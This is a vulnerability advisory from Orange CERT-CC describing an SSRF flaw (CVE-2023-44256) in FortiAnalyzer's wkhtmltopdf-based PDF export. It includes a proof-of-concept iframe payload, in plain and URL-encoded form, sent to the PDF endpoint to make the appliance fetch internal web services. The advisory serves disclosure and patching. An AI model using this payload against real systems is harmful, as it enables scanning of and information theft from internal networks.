Skip to content

Fortinet FortiAnalyzer - SSRF wkhtmltopdf (CVE-2023-44256)

High
orange-cert-cc published GHSA-2hc5-p5mc-8vrh Oct 11, 2023

Package

FortiAnalyzer (Fortinet)

Affected versions

7.2.2

Patched versions

7.2.4

Description

Overview

PDF report generation of the FortiAnalyzer contains a vulnerability that allows remote logged user to make the FortiAnalyzer execute web requests to FortiAnalyzer's local and reachable network web services. The web responses of these requests will be displayed in the rendered PDF.

Details

By performing this Server Side Request Forgery (SSRF), attacker can gain access to information and web service that are normally not accessible. The attacker can also anonymize his malicious actions by having them executed by the FortiAnalyzer.

Proof of Concept

On the FortiAnalyzer, access to the FortiViews functionality then to Top Threat allows the generation of a PDF summarizing the data viewed.

The generation of the PDF notably involves sending HTML data in POST to the entry point /p/fortiview/download/pdf/.

Following receipt of this data. The server returns a PDF file containing the HTML data sent. The generated PDF contains in particular in its metadata the software solution used for the generation of the PDF from the HTML code and its version: wkhtmltopdf 0.12.6-dev

This software solution is outdated and affected by a public vulnerability. This weakness was used to insert HTML code which will be interpreted by the server to request neighboring resources (local network web services) and display obtained responses in the rendered PDF.

HTML code sent as POST parameter:

X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>
X.X.X.X <iframe src="http://X.X.X.X/" height=500 width=500></iframe>

To be correctly interpreted by the PDF generator, this code must be encoded in URL format:

%31%39%38%2e%31%39%2e%33%39%2e%31%32%30%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%32%30%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%31%34%37%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%34%37%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%31%35%35%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%31%35%35%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%31%34%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%31%34%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%32%39%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%32%39%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a%31%39%38%2e%31%39%2e%33%39%2e%32%34%38%20%3c%69%66%72%61%6d%65%20%73%72%63%3d%22%68%74%74%70%3a%2f%2f%31%39%38%2e%31%39%2e%33%39%2e%32%34%38%2f%22%20%68%65%69%67%68%74%3d%35%30%30%20%77%69%64%74%68%3d%35%30%30%3e%3c%2f%69%66%72%61%6d%65%3e%0a

The HTML code is interpreted by the server-side PDF generator, which requests the specified web resources and then inserts obtained responses into the generated PDF, which allows the attacker to scan the neighboring web services (or any network reachable by the FortiAnalyzer).

The above evidence exposes obtaining multiple valid responses from servers in the attacked FortiAnalyzer's local network.

Solution

Security patch

Upgrade to fixed version, as described in Fortinet Security Advisory

References

https://nvd.nist.gov/vuln/detail/CVE-2023-44256
https://www.fortiguard.com/psirt/FG-IR-19-039

Credits

Mickael Dorigny at Orange Cyberdéfense

For Hélène Saliou, Frédéric Prevost, François-Xavier Picard at Orange group

Orange CERT-CC at Orange group

Timeline

Date reported: May 31, 2023
Date fixed: October 10, 2023

Severity

High

CVSS overall score

This score calculates overall vulnerability severity from 0 to 10 and is based on the Common Vulnerability Scoring System (CVSS).
/ 10

CVSS v3 base metrics

Attack vector
Network
Attack complexity
Low
Privileges required
Low
User interaction
None
Scope
Changed
Confidentiality
High
Integrity
None
Availability
None

CVSS v3 base metrics

Attack vector: More severe the more the remote (logically and physically) an attacker can be in order to exploit the vulnerability.
Attack complexity: More severe for the least complex attacks.
Privileges required: More severe if no privileges are required.
User interaction: More severe when no user interaction is required.
Scope: More severe when a scope change occurs, e.g. one vulnerable component impacts resources in components beyond its security scope.
Confidentiality: More severe when loss of data confidentiality is highest, measuring the level of data access available to an unauthorized user.
Integrity: More severe when loss of data integrity is the highest, measuring the consequence of data modification possible by an unauthorized user.
Availability: More severe when the loss of impacted component availability is highest.
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N

CVE ID

CVE-2023-44256

Weaknesses

Server-Side Request Forgery (SSRF)

The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination. Learn more on MITRE.